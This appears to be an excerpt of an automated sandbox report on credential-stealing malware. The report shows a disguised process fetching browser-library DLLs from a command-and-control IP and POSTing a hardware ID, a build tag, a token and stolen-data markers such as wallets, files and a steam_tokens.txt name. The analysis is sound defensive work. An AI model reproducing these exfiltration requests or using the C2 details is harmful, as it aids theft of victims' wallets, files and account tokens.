3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 2d 2d 0d 0a Data Ascii: ------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="file"------EGCFIDAFBFBAKFHJEGIJ--
                      Source: global trafficHTTP traffic detected: GET /3538548809da56b2/freebl3.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /3538548809da56b2/mozglue.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /3538548809da56b2/msvcp140.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /3538548809da56b2/nss3.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /3538548809da56b2/softokn3.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /3538548809da56b2/vcruntime140.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEHCGDBFCBAKECBKKEBHost: 147.45.44.221Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHJEBFBFHJECAKFCAAHost: 147.45.44.221Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 2d 2d 0d 0a Data Ascii: ------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="message"wallets------GHDHJEBFBFHJECAKFCAA--
                      Source: global trafficHTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFCAKKKFBGDGCAKFCFHHost: 147.45.44.221Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 43 41 4b 4b 4b 46 42 47 44 47 43 41 4b 46 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 41 4b 4b 4b 46 42 47 44 47 43 41 4b 46 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 41 4b 4b 4b 46 42 47 44 47 43 41 4b 46 43 46 48 2d 2d 0d 0a Data Ascii: ------FBFCAKKKFBGDGCAKFCFHContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------FBFCAKKKFBGDGCAKFCFHContent-Disposition: form-data; name="message"files------FBFCAKKKFBGDGCAKFCFH--
                      Source: global trafficHTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHDBAEGIIIEBGCAAFHIHost: 147.45.44.221Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 2d 2d 0d 0a Data Ascii: ------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="file"------KEHDBAEGIIIEBGCAAFHI--
                      Source: global trafficHTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFBHost: 147.45.44.221Content-Length: 131659Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JECGIIIDAKJDHJKFHIEBHost: 147.45.44.221Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 2d 2d 0d 0a Data Ascii: ------JECGIIIDAKJDHJKFHIEBContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------JECGIIIDAKJDHJKFHIEBContent-Disposition: form-data; name="message"ybncbhylepme------JECGIIIDAKJDHJKFHIEB--
                      Source: global trafficHTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJEGDBGDBFIJKECBAKFHost: 147.45.44.221Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 2d 2d 0d 0a Data Ascii: ------HIJEGDBGDBFIJKECBAKFContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------HIJEGDBGDBFIJKECBAKFContent-Disposition: form-data; name="message"wkkjqaiaxkhb------HIJEGDBGDBFIJKECBAKF--
                      Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49732 -> 147.45.44.221:80
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.221
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02756280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_02756280
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 147.45.44.221Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /3538548809da56b2/sqlite3.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /3538548809da56b2/freebl3.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /3538548809da56b2/mozglue.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /3538548809da56b2/msvcp140.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /3538548809da56b2/nss3.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /3538548809da56b2/softokn3.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /3538548809da56b2/vcruntime140.dll HTTP/1.1Host: 147.45.44.221Cache-Control: no-cache
                      Source: unknownHTTP traffic detected: POST /28166bd28a5d19e6.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFBGHCAKKFCAKEBKJKKHost: 147.45.44.221Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 37 39 34 30 30 32 39 30 43 35 33 35 32 38 30 30 33 31 39 37 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6e 66 7a 65 6f 6e 77 63 69 74 75 63 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 2d 2d 0d 0a Data Ascii: ------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="hwid"D579400290C53528003197------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="build"nfzeonwcituc------DAFBGHCAKKFCAKEBKJKK--
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221/
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.php
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.php#
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.php;
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.phpD
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.phpK
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.phpW
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.phpare
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.phpc
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.phpition:
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.phpla
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221/28166bd28a5d19e6.phpwser
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221/3538548809da56b2/freebl3.dll
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221/3538548809da56b2/freebl3.dll4
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221/3538548809da56b2/mozglue.dll
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221/3538548809da56b2/mozglue.dll8
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221/3538548809da56b2/mozglue.dllX
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221/3538548809da56b2/msvcp140.dll
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221/3538548809da56b2/nss3.dll
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221/3538548809da56b2/nss3.dllX
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221/3538548809da56b2/softokn3.dll
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221/3538548809da56b2/sqlite3.dll
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221/3538548809da56b2/vcruntime140.dll6
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221/3538548809da56b2/vcruntime140.dllW
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221/c
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221KEBFB
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.221b
                      Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                      Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                      Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                      Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                      Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
